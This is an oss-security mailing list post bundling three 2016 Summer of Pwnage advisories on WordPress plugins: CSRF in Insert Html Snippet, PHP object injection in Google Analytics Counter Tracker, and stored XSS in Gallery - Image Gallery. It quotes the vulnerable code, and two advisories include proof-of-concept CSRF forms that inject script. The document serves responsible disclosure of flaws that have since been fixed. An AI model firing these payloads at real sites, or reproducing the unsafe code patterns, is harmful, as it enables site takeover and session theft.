Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 11 Dec 2016 10:02:54 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting three WordPress Plugins (XSS, &
 PHP object injection)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.







------------------------------------------------------------------------
Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0027

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Insert Html Snippet WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update an existing HTML snippet. This can be used to insert
arbitrary HTML and scripting code within a post or page that uses the
snippet. In order to exploit this issue, the attacker has to lure/force
a logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Insert Html Snippet [2] WordPress
Plugin version 1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Insert Html Snippet [3] version 1.2.1.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Insert Html Snippet [2] is a plugin for WordPress that allows you to add
HTML, CSS and javascript code to your pages and posts easily using
shortcodes. It was discovered that the Insert Html Snippet WordPress
Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this
issue can be used to update an existing HTML snippet. This can be used
to insert arbitrary HTML and scripting code within a post or page that
uses the snippet.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Insert Html Snippet lacks protection against
Cross-Site Request Forgery attacks. See for example the code that is
used to edit a snippet.

if(isset($_POST) && isset($_POST['updateSubmit'])){
	
// 		echo '<pre>';
// 		print_r($_POST);
// 		die("JJJ");
	$_POST = stripslashes_deep($_POST);
	$_POST = xyz_trim_deep($_POST);
	
	$xyz_ihs_snippetId = $_GET['snippetId'];
	
	$temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
	$temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);
	
	$xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
	$xyz_ihs_content = $_POST['snippetContent'];
	
	if($xyz_ihs_title != "" && $xyz_ihs_content != ""){
	
		if(ctype_alnum($temp_xyz_ihs_title))
		{
		$snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM
'.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT
0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;
	
		if($snippet_count == 0){
			$xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';
	
			$wpdb->update($wpdb->prefix.'xyz_ihs_short_code',
array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,),
array('id'=>$xyz_ihs_snippetId));

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1"
method="POST">
			<input type="hidden" name="snippetId" value="1" />
			<input type="hidden" name="snippetTitle" value="Fu" />
			<input type="hidden" name="snippetContent"
value="<script>alert(1);</script>" />
			<input type="hidden" name="updateSubmit" value="Update" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_insert_html_snippet_wordpress_plugin.html
[2] https://wordpress.org/plugins/insert-html-snippet/
[3] https://downloads.wordpress.org/plugin/insert-html-snippet.1.2.1.zip
------------------------------------------------------------------------
Google Analytics Counter Tracker WordPress Plugin unauthenticed PHP
Object injection vulnerability
------------------------------------------------------------------------
Remco Vermeulen, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in Google Analytics
Counter Tracker, which can be used by an unautenthicated user to
instantiated arbitrary PHP Objects. Using this vulnerability it is
possible to execute arbitrary PHP code.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0035

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Google Analytics Counter
Tracker [2] WordPress Plugin version 3.1.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Google Analytics Counter Tracker
version 3.5.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Google Analytics Counter Tracker [2]  analyse the visitors hits on you
website and display it graphically. A PHP Object injection [4]
vulnerability was found in Google Analytics Counter Tracker, which can
be used by an unautenthicated user to instantiated arbitrary PHP
Objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to an unsafe call to unserialize() in the
proccessRequest() method. The input is taken directly from the
wpadm_ga_request cookie as can be seen in the following code fragment:

class.wpadm-ga.php:

protected static function proccessRequest() {
	$request_name = self::REQUEST_PARAM_NAME;
	$params = unserialize(base64_decode($_POST[$request_name]));
	
	$v = self::verifySignature($params['sign'],
get_option('wpadm_ga_pub_key'), md5(serialize($params['data'])));

It has been confirmed that this issues can be used to execute arbitrary
PHP code.
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/google_analytics_counter_tracker_wordpress_plugin_unauthenticed_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/analytics-counter/
[3] https://downloads.wordpress.org/plugin/analytics-counter.zip
[4] https://www.owasp.org/index.php/PHP_Object_Injection
------------------------------------------------------------------------
Stored Cross-Site Scripting in Gallery - Image Gallery WordPress Plugin
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability was found in the Gallery
- Image Gallery plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a URL provided by an attacker.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0015

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Gallery - Image Gallery [2]
WordPress Plugin version 1.9.65.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Gallery - Image Gallery [3] WordPress Plugin
version 2.0.6.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Gallery image is the best gallery plugin to use if you want to be
original with your website. A persistent Cross-Site Scripting
vulnerability was found in the Gallery - Image Gallery plugin. This
issue allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a URL
provided by an attacker.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists because the Gallery image does not protect against CSRF
attacks for the requests to edit gallery images. This makes it possible
to change gallery image URLs to JavaScript schemas. The JavaScript will
be saved. Every time a user clicks on the gallery image the JavaScript
will run (Persistent Cross-Site Scripting).

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
Have an authenticated admin visit a webpage with the following form:

<html>
  <body>
    <form action="http://<wordpress
site>/wp-admin/admin.php?page=gallerys_huge_it_gallery&id=2&task=apply&huge_it_nonce=b37a25b33d"
method="POST">
      <input type="hidden" name="changedvalues" value="11" />
      <input type="hidden" name="name" value="New&#32;gallery" />
      <input type="hidden" name="imagess" value="" />
      <input type="hidden" name="order&#95;by&#95;11" value="1" />
      <input type="hidden" name="imagess11" value="Foo" />
      <input type="hidden" name="titleimage11" value="test" />
      <input type="hidden" name="im&#95;description11" value="asd" />
      <input type="hidden" name="sl&#95;url11"
value="javascript&#58;alert&#40;1&#41;" />
      <input type="hidden" name="sl&#95;link&#95;target11" value="" />
      <input type="hidden" name="like&#95;11" value="9" />
      <input type="hidden" name="dislike&#95;11" value="0" />
      <input type="hidden" name="name" value="New&#32;gallery" />
      <input type="hidden" name="huge&#95;it&#95;sl&#95;effects"
value="5" />
      <input type="hidden" name="sl&#95;width" value="600" />
      <input type="hidden" name="sl&#95;height" value="1" />
      <input type="hidden" name="gallery&#95;list&#95;effects&#95;s"
value="cubeH" />
      <input type="hidden" name="sl&#95;position" value="center" />
      <input type="hidden" name="display&#95;type" value="2" />
      <input type="hidden" name="content&#95;per&#95;page" value="5" />
      <input type="hidden" name="autoslide" value="off" />
      <input type="hidden" name="autoslide" value="on" />
      <input type="hidden" name="pause&#95;on&#95;hover" value="off" />
      <input type="hidden" name="pause&#95;on&#95;hover" value="on" />
      <input type="hidden" name="sl&#95;pausetime" value="4000" />
      <input type="hidden" name="sl&#95;changespeed" value="1000" />
      <input type="hidden" name="rating" value="dislike" />
      <input type="hidden" name="task" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will change the URL for the image (the image source) to
javascript:alert(1). If a user clicks on the image name, the JavaScript
will run.
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_gallery___image_gallery_wordpress_plugin.html
[2] https://wordpress.org/plugins/gallery-images/
[3] https://downloads.wordpress.org/plugin/gallery-images.2.0.6.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ